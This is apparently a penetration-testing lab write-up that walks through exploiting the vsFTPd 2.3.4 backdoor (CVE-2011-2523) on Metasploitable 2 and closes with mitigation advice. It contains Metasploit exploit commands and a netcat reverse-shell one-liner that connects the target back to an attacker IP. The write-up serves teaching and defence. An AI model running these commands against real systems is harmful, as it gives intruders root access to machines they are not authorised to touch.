来源

关联漏洞

描述

A step-by-step walkthrough of exploiting the vsFTPd 2.3.4 backdoor vulnerability (CVE-2011-2523) in a controlled lab environment, demonstrating reconnaissance, exploitation with Metasploit, and establishing a reverse shell.

介绍

# Penetration Testing Lab: vsFTPd 2.3.4 Backdoor Exploitation

This repository documents the process of identifying and exploiting the famous backdoor vulnerability in vsFTPd version 2.3.4 within a controlled lab environment (Metasploitable 2).

## Overview

During a routine penetration test, the vsFTPd service running on port 21 was identified as vulnerable. The service was found to be version 2.3.4, which contains a documented backdoor that allows unauthenticated remote command execution. This document details the steps taken to confirm the vulnerability and gain a reverse shell on the target system.

## Vulnerability Details

*   **Service:** vsFTPd (Very Secure FTP Daemon)
*   **Version:** 2.3.4
*   **CVE:** CVE-2011-2523
*   **Risk:** Critical (Remote Code Execution)

## Lab Setup

*   **Attacker Machine:** Kali Linux
*   **Target Machine:** Metasploitable 2
* **Network Configuration:** The machines were connected via a NAT and bridged network adapter, allowing the attacker to access services on the target's local IP address.

## Executive Summary
A critical backdoor was identified in the target's FTP service (vsFTPd 2.3.4). This vulnerability allows an unauthenticated attacker to gain remote command execution, ultimately leading to a full reverse shell on the system.

## Phase 1: Reconnaissance & Enumeration

The initial discovery was made using a port scan with `nmap`.

**Command:**
```bash
nmap -sS -sV -A <target-ip>
```

**Relevant Findings:**
```
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
...
```
## Phase 2: Vulnerability Identification
The version `2.3.4` is notoriously vulnerable. This was confirmed using `searchsploit`.

**Commands:**
```bash
searchsploit vsftpd 2.3.4
```
*Output revealed several public exploits, confirming the vulnerability.*

## Phase 3: Initial Exploitation Attempts

### Attempt 1: Standalone Python Exploit
A public Python exploit was mirrored and executed but failed due to compatibility issues.

**Commands:**
```bash
searchsploit -m unix/remote/49757.py
python 49757.py <target-ip>
```
*Result: Script error (incompatible with Python 3).*

### Attempt 2: Metasploit Module
The Metasploit Framework provides a reliable exploit module.

**Commands:**
```bash
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <target-ip>
run
```
*Result: The exploit ran successfully, triggering the backdoor. However, a standard Metasploit shell was not established. The backdoor opens a root shell on port 6200.*

## Phase 4: Manual Shell Access
The Metasploit module confirmed the backdoor was present.

### Step 1: Verify backdoor activity.
```bash
telnet <target-ip> 6200
```
*Observation: Connection established but hung, indicating a listening shell.*

### Step 2: Establish a Reverse Shell
A reverse shell was set up using Netcat for stability.

**On Attacker (Kali): Start listener.**
```bash
nc -lvnp 4444
```

**On Target (via backdoor): Execute reverse shell.**
```bash
/bin/nc <attacker-ip> 4444 -e /bin/bash
```
  
`4444`: Listener port.  
`-e /bin/bash`: Executes bash shell.*

*Result: Netcat listener caught the connection, providing a root shell on the target.*

## Phase 5: Mitigation Strategies
Immediate Action: Upgrade vsFTPd to the latest version available from the official repository.

Network Controls: If upgrade is not possible, restrict FTP access at the network level (firewall) to only trusted IP addresses.

Compromise Assessment: A system running this vulnerable version should be considered fully compromised. A full forensic investigation and password resets are required.

Monitoring: Implement IDS/IPS rules to detect and block exploit attempts against this specific vulnerability.

## References
- Exploit-DB: [vsftpd 2.3.4 Backdoor Exploit](https://www.exploit-db.com/exploits/17491)
- CVE-2011-2523: [MITRE Advisory](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523)
- NVD: [National Vulnerability Database Entry](https://nvd.nist.gov/vuln/detail/CVE-2011-2523)

## Disclaimer

This information is for **educational purposes only**. It is intended for use in authorized lab environments to understand attack methodologies and improve defensive strategies. Unauthorized testing against systems you do not own is illegal.

文件快照

 [4.0K]  /data/pocs/1e316cd042b13947b0507a09998a4e5c4166ce54
└── [4.2K]  README.md

0 directories, 1 file

备注